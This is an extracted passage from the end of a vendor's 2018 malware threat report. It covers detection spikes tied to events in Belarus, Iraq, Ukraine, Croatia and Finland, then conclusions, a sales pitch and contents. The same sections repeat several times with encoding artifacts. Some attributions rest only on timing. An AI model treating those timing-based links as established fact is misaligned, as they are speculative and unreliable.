-
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 All Rights Reserved, Comodo Security Solutions Inc. Visit comodo.com.
North America: Comodo Security Solutions Inc, 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
Europe: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
Asia: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating drive to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 ALL RIGHTS RESERVED, COMODO SECURITY SOLUTIONS INC. VISIT COMODO.COM
NORTH AMERICA: Comodo Security Solutions Inc, 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania, Europe. +40 332 806 772
ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.